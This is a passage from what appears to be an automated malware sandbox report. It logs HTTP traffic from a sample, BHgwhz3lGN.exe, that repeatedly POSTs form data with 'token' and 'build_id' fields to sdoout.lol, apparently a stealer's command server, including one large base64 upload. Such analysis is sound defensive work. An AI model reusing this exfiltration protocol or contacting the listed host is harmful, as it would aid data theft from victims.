                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:49 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          101192.168.2.954037116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:49 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----0rqq1ny5fukxbiwb1dje
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1841
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:49 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 30 72 71 71 31 6e 79 35 66 75 6b 78 62 69 77 62 31 64 6a 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 30 72 71 71 31 6e 79 35 66 75 6b 78 62 69 77 62 31 64 6a 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 30 72 71 71 31 6e 79 35 66 75 6b 78 62 69 77 62 31 64 6a 65 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------0rqq1ny5fukxbiwb1djeContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------0rqq1ny5fukxbiwb1djeContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------0rqq1ny5fukxbiwb1djeCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:50 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:49 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:50 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          102192.168.2.954038116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:50 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----5pzmopzcjectri5fua16
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1829
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:50 UTC1829OUTData Raw: 2d 2d 2d 2d 2d 2d 35 70 7a 6d 6f 70 7a 63 6a 65 63 74 72 69 35 66 75 61 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 35 70 7a 6d 6f 70 7a 63 6a 65 63 74 72 69 35 66 75 61 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 35 70 7a 6d 6f 70 7a 63 6a 65 63 74 72 69 35 66 75 61 31 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------5pzmopzcjectri5fua16Content-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------5pzmopzcjectri5fua16Content-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------5pzmopzcjectri5fua16Cont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:51 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:50 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:51 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          103192.168.2.954039116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:51 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----5pzmopzcjectri5fua16
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1825
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:51 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 35 70 7a 6d 6f 70 7a 63 6a 65 63 74 72 69 35 66 75 61 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 35 70 7a 6d 6f 70 7a 63 6a 65 63 74 72 69 35 66 75 61 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 35 70 7a 6d 6f 70 7a 63 6a 65 63 74 72 69 35 66 75 61 31 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------5pzmopzcjectri5fua16Content-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------5pzmopzcjectri5fua16Content-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------5pzmopzcjectri5fua16Cont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:52 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:52 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:52 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          104192.168.2.954040116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:52 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----2d2n790hv3ohvas00r9r
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1825
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:52 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 32 64 32 6e 37 39 30 68 76 33 6f 68 76 61 73 30 30 72 39 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 32 64 32 6e 37 39 30 68 76 33 6f 68 76 61 73 30 30 72 39 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 32 64 32 6e 37 39 30 68 76 33 6f 68 76 61 73 30 30 72 39 72 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------2d2n790hv3ohvas00r9rContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------2d2n790hv3ohvas00r9rContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------2d2n790hv3ohvas00r9rCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:53 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:53 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:53 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          105192.168.2.954041116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:53 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----k6fcj58y5fk68qq90r1d
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 453
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:53 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 6b 36 66 63 6a 35 38 79 35 66 6b 36 38 71 71 39 30 72 31 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 6b 36 66 63 6a 35 38 79 35 66 6b 36 38 71 71 39 30 72 31 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 6b 36 66 63 6a 35 38 79 35 66 6b 36 38 71 71 39 30 72 31 64 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------k6fcj58y5fk68qq90r1dContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------k6fcj58y5fk68qq90r1dContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------k6fcj58y5fk68qq90r1dCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:54 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:53 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:54 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          106192.168.2.954042116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:55 UTC277OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----l6xlf379r90hvas2djek
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 98321
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:55 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 6c 36 78 6c 66 33 37 39 72 39 30 68 76 61 73 32 64 6a 65 6b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 6c 36 78 6c 66 33 37 39 72 39 30 68 76 61 73 32 64 6a 65 6b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 6c 36 78 6c 66 33 37 39 72 39 30 68 76 61 73 32 64 6a 65 6b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------l6xlf379r90hvas2djekContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------l6xlf379r90hvas2djekContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------l6xlf379r90hvas2djekCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:55 UTC16355OUTData Raw: 55 55 55 55 41 46 46 46 46 41 42 53 55 74 46 41 43 55 55 55 55 41 46 4a 53 30 55 41 4a 52 52 52 51 41 55 6c 4c 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 42 6f 6f 4e 41 43 55 55 55 55 41 46 46 46 46 41 43 55 55 74 4a 51 41 6c 46 4c 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 6c 46 46 46 41 42 53 47 6c 70 44 51 41 55 55 55 55 41 46 4a 53 30 6c 41 42 51 61 4b 4b 41 45 6f 70 61 53 67 41 6f 6f 6f 6f 41 4b 53 6c 6f 6f 41 53 69 69 69 67 42 4b 4b 57 6b 6f 41 4b 4b 4b 4b 41 45 6f 6f 6f 6f 41 4b 53 6c 70 4b 41 43 6b 70 61 53 67 41 6f 6f 6f 6f 41 31 36 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 53 76 4d 66 69 55 76 38 41 59 2f 69 7a 77 78 34 6d 58 68 49 70 78 62 7a 74 2f 73 35 7a 2f
                                                                                                                                                                                                                                                                                          Data Ascii: UUUUAFFFFABSUtFACUUUUAFJS0UAJRRRQAUlLRQAlFFFABRRRQAUUUUAFBooNACUUUUAFFFFACUUtJQAlFLRQAlFFFABRRRQAlFFFABRRRQAlFFFABRRRQAlFFFABSGlpDQAUUUUAFJS0lABQaKKAEopaSgAooooAKSlooASiiigBKKWkoAKKKKAEooooAKSlpKACkpaSgAooooA16KKKACiiigAooooASvMfiUv8AY/izwx4mXhIpxbzt/s5z/
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:55 UTC16355OUTData Raw: 58 74 35 66 52 74 48 6d 5a 34 57 4f 6c 7a 56 62 64 69 56 66 61 70 56 2b 74 51 67 31 49 44 58 71 4a 48 46 59 6e 55 38 31 4b 6f 79 61 69 58 72 55 79 34 37 35 6f 73 5a 76 79 46 78 6e 33 71 49 75 38 54 5a 51 6b 56 30 57 6c 65 48 70 62 77 43 57 34 4a 53 49 39 42 33 4e 64 52 44 34 61 30 6c 49 67 72 57 6f 6b 39 53 35 35 72 68 72 59 36 6c 42 38 75 35 32 55 73 42 55 71 4b 37 30 4f 4a 73 72 78 5a 78 74 59 34 63 56 63 48 31 72 62 31 48 77 66 61 4d 50 4f 73 43 59 5a 6c 35 41 37 47 73 44 4d 6b 55 6a 52 54 4c 74 6b 55 34 59 56 35 39 53 74 43 57 73 54 48 45 59 57 56 46 33 65 78 4d 4b 73 78 4e 7a 56 51 4e 79 4b 6d 6a 50 4e 65 64 56 6c 71 63 36 4e 69 32 63 35 46 62 31 72 4a 6c 4b 35 6d 32 62 70 57 37 5a 53 56 77 54 33 4c 6a 6f 58 37 75 50 7a 37 4f 52 44 32 55 6b 66 57 75
                                                                                                                                                                                                                                                                                          Data Ascii: Xt5fRtHmZ4WOlzVbdiVfapV+tQg1IDXqJHFYnU81KoyaiXrUy475osZvyFxn3qIu8TZQkV0WleHpbwCW4JSI9B3NdRD4a0lIgrWok9S55rhrY6lB8u52UsBUqK70OJsrxZxtY4cVcH1rb1HwfaMPOsCYZl5A7GsDMkUjRTLtkU4YV59StCWsTHEYWVF3exMKsxNzVQNyKmjPNedVlqc6Ni2c5Fb1rJlK5m2bpW7ZSVwT3LjoX7uPz7ORD2UkfWu
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:55 UTC16355OUTData Raw: 4c 77 73 59 6a 79 55 75 4a 6c 7a 39 4a 47 72 71 5a 66 38 41 56 50 37 71 66 35 56 7a 50 77 2f 50 2f 45 69 6e 2f 77 43 76 79 66 38 41 39 47 4e 51 42 31 66 57 69 6c 48 53 69 67 42 4b 4b 4b 4b 41 43 6b 6f 70 61 41 45 78 53 55 74 4c 51 41 32 6b 7a 54 73 55 6d 4b 41 4f 48 31 35 64 33 6a 37 54 51 41 54 2b 37 42 50 48 75 61 36 31 77 32 7a 39 32 71 37 6a 30 7a 58 4f 61 68 6b 66 45 4b 7a 32 70 76 50 32 5a 75 50 7a 72 6f 50 4e 75 63 38 32 35 78 37 4d 4b 74 45 4d 57 52 6c 69 69 33 4f 42 6e 67 48 61 4b 52 49 59 34 77 46 7a 79 54 6e 6b 30 65 5a 50 2f 77 41 2b 72 66 38 41 66 61 31 45 42 4f 58 4c 79 51 4d 78 42 79 76 7a 44 69 71 4a 4c 47 7a 50 51 44 30 36 30 30 49 33 6e 4e 6b 4c 73 2f 68 48 70 51 5a 4a 2b 76 32 5a 76 2b 2b 68 52 35 73 2f 48 2b 6a 4e 7a 2f 74 69 67 43 4e
                                                                                                                                                                                                                                                                                          Data Ascii: LwsYjyUuJlz9JGrqZf8AVP7qf5VzPw/P/Ein/wCvyf8A9GNQB1fWilHSigBKKKKACkopaAExSUtLQA2kzTsUmKAOH15d3j7TQAT+7BPHua61w2z92q7j0zXOahkfEKz2pvP2ZuPzroPNuc825x7MKtEMWRlii3OBngHaKRIY4wFzyTnk0eZP/wA+rf8Afa1EBOXLyQMxByvzDiqJLGzPQD0600I3nNkLs/hHpQZJ+v2Zv++hR5s/H+jNz/tigCN
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:55 UTC16355OUTData Raw: 70 78 64 6d 6d 4e 53 6c 73 39 6a 48 62 56 72 39 4a 4d 4e 5a 6c 6c 55 34 4f 31 54 79 66 38 4d 59 71 5a 74 59 6d 55 74 2f 6f 45 70 41 58 63 4d 44 72 57 76 67 65 67 78 52 67 65 67 34 36 56 73 68 47 44 4c 72 56 32 34 68 4d 46 6c 49 43 78 47 34 4d 4f 67 72 63 58 4a 55 45 39 78 54 73 44 47 4f 50 79 6f 41 34 70 67 4a 53 5a 70 39 4a 69 67 44 6b 37 67 2f 38 58 4c 73 76 2b 76 52 76 36 31 31 31 63 66 65 6e 62 38 53 62 48 2f 72 30 62 2b 74 64 50 35 68 39 61 41 4c 4f 52 54 66 78 71 44 7a 50 65 6b 33 6d 67 43 63 39 61 53 6f 64 35 6f 38 77 30 41 53 45 6d 6d 6d 6f 7a 49 61 54 64 51 41 2b 6b 4a 46 4d 4a 4e 4d 4c 55 41 50 4c 55 77 6d 6d 46 36 4e 31 41 44 73 30 30 6d 6d 6c 71 61 57 6f 41 63 54 54 53 61 61 54 52 6e 69 67 42 63 30 32 6b 7a 53 5a 6f 41 55 6d 6d 35 70 43 61 54
                                                                                                                                                                                                                                                                                          Data Ascii: pxdmmNSls9jHbVr9JMNZllU4O1Tyf8MYqZtYmUt/oEpAXcMDrWvgegxRgeg46VshGDLrV24hMFlICxG4MOgrcXJUE9xTsDGOPyoA4pgJSZp9JigDk7g/8XLsv+vRv6111cfenb8SbH/r0b+tdP5h9aALORTfxqDzPek3mgCc9aSod5o8w0ASEmmmozIaTdQA+kJFMJNMLUAPLUwmmF6N1ADs00mmlqaWoAcTTSaaTRnigBc02kzSZoAUmm5pCaT
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:55 UTC16355OUTData Raw: 62 49 78 42 4f 4e 78 50 4a 78 6e 6a 50 51 64 4b 35 71 34 73 45 66 79 78 4e 6f 31 33 4a 72 69 36 74 48 4a 4c 64 69 31 63 35 69 2b 30 41 67 2b 62 6a 42 51 4a 74 2b 58 4a 78 6a 6f 4e 75 51 66 61 53 44 70 63 39 45 71 43 30 76 49 4c 36 45 7a 57 30 6d 2b 4d 4f 38 5a 4f 43 50 6d 56 69 72 44 6e 30 49 49 72 68 6c 74 35 70 2f 47 46 6e 64 4a 70 51 67 6b 2b 33 53 72 63 46 64 4e 6c 44 6d 50 5a 49 75 58 75 53 64 72 71 33 79 6b 4b 42 67 5a 55 5a 34 35 62 46 59 57 2b 6e 36 4a 4c 59 4c 6f 4b 4b 57 31 47 58 37 51 58 30 75 53 61 4e 55 33 79 4e 47 78 6a 51 44 7a 6c 78 74 41 77 53 46 79 44 78 6a 46 48 53 34 33 76 62 2b 75 76 38 41 6b 65 68 55 56 7a 2f 67 75 47 65 33 38 4f 72 44 50 45 30 57 79 34 6e 38 74 47 68 61 45 42 50 4d 59 72 68 47 4a 4b 72 6a 47 42 6b 34 47 4b 36 43 68
                                                                                                                                                                                                                                                                                          Data Ascii: bIxBONxPJxnjPQdK5q4sEfyxNo13Jri6tHJLdi1c5i+0Ag+bjBQJt+XJxjoNuQfaSDpc9EqC0vIL6EzW0m+MO8ZOCPmVirDn0IIrhlt5p/GFndJpQgk+3SrcFdNlDmPZIuXuSdrq3ykKBgZUZ45bFYW+n6JLYLoKKW1GX7QX0uSaNU3yNGxjQDzlxtAwSFyDxjFHS43vb+uv8AkehUVz/guGe38OrDPE0Wy4n8tGhaEBPMYrhGJKrjGBk4GK6Ch
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:55 UTC191OUTData Raw: 50 48 4a 47 78 56 6b 59 48 49 49 49 35 42 42 37 31 30 74 6a 34 38 31 58 4c 77 61 2f 4c 50 34 67 30 36 51 44 66 5a 36 68 63 75 34 44 44 37 72 49 78 4a 4b 4d 44 33 48 55 45 67 39 61 35 61 69 69 77 48 51 61 68 34 33 38 53 36 6a 35 38 63 6d 74 58 73 56 72 4d 70 6a 4e 6e 62 7a 76 48 62 72 47 52 6a 79 31 6a 42 32 68 63 63 59 78 30 72 6e 36 4b 4b 59 42 56 79 54 2f 6b 43 32 76 2f 58 78 4e 2f 36 44 48 56 4f 72 6b 6e 2f 49 46 74 66 2b 76 69 62 2f 41 4e 42 6a 6f 41 2f 2f 32 51 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 6c 36 78 6c 66 33 37 39 72 39 30 68 76 61 73 32 64 6a 65 6b 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: PHJGxVkYHIII5BB710tj481XLwa/LP4g06QDfZ6hcu4DD7rIxJKMD3HUEg9a5aiiwHQah438S6j58cmtXsVrMpjNnbzvHbrGRjy1jB2hccYx0rn6KKYBVyT/kC2v/XxN/6DHVOrkn/IFtf+vib/ANBjoA//2Q==------l6xlf379r90hvas2djek--
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:56 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:56 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:56 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          107192.168.2.954043116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:57 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----ec2v37y5fuk6fuaiwln7
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
